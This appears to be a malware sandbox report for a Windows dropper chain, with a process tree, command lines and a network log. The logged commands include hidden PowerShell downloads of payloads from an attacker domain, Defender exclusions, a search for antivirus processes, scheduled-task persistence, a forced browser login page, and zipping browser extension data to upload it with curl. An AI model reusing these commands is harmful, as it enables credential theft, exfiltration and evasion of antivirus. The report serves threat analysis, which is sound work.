PID 4048 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
PID 4048 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
PID 1848 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1848 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1848 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4048 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
PID 4048 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
PID 4048 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
PID 2564 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2564 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2564 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
PID 2564 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2564 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2564 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
PID 2068 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
PID 2068 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
PID 2068 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
PID 1988 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1988 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1988 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Windows\SysWOW64\net.exe
PID 1988 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1988 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 1988 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
PID 3844 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3844 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3844 wrote to memory of 2544 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3448 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
PID 3448 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
PID 3448 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
PID 2564 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2564 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2564 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 3620 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 3620 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 2544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4956 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4956 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2564 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
PID 2564 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
PID 2564 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
PID 4956 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4956 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4956 wrote to memory of 3564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
PID 4956 wrote to memory of 1312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe

"C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe

C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

"C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"

C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

"C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp" /SL5="$80238,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause raf_encoder_1252

C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

"C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause raf_encoder_1252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2904 -ip 2904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2904 -ip 2904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1664

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4764 -ip 4764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4764 -ip 4764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1620

C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

"C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe

"C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 491505

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B

C:\Users\Admin\AppData\Local\Temp\491505\Dr.com

Dr.com B

C:\Windows\SysWOW64\choice.exe

choice /d y /t 15

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1652

C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe

"C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe"

C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe

"C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1964 -prefMapHandle 1956 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f03138-6534-469c-8f21-5220d70f3425} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9b937f-b66b-4cc9-a25d-ce5d9d590e9a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d9752fd-55e6-47e9-b2d7-aad876e04da4} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c0a44d-dba6-499e-8750-28083730bc69} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4af03d6e-1024-4cb8-ab8e-fbff5239d5a3} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" utility

C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe

"C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89a3350a-4d71-49fb-ae2d-0bb5475aadd7} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5380 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e83fb09-95a2-42b0-b296-22cf085bf81a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5588 -prefMapHandle 5592 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0e71c56-2449-4833-8005-4cf322f47822} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab

C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe

"C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

"C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"

C:\Windows\SysWOW64\xcopy.exe

xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org

C:\Windows\SysWOW64\curl.exe

curl -s https://api.ipify.org

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

"C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Windows\SysWOW64\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"

C:\Users\Admin\AppData\Local\asm\mi.exe

"C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 8.8.8.8:53 166.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
RU 185.215.113.43:80 185.215.113.43 tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 153.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 167.136.67.172.in-addr.arpa udp
US 8.8.8.8:53 96.153.67.172.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 74.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 ratiomun.cyou udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 156.43.21.104.in-addr.arpa udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 print-vexer.biz udp
US 104.21.35.246:443 print-vexer.biz tcp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 246.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 104.21.35.246:443 print-vexer.biz tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 104.21.81.153:443 se-blurry.biz tcp
US 172.67.136.167:443 zinc-sneark.biz tcp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY udp
US 172.67.173.74:443 formy-spill.biz tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 172.67.206.64:443 covery-mover.biz tcp
US 104.21.43.156:443 dare-curbys.biz tcp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 104.21.35.246:443 print-vexer.biz tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 172.67.160.80:443 marshal-zhukov.com tcp
RU 185.215.113.206:80 185.215.113.206 tcp
N/A 127.0.0.1:58570 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
GB 216.58.213.14:443 youtube.com tcp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 216.58.213.14:443 youtube.com udp
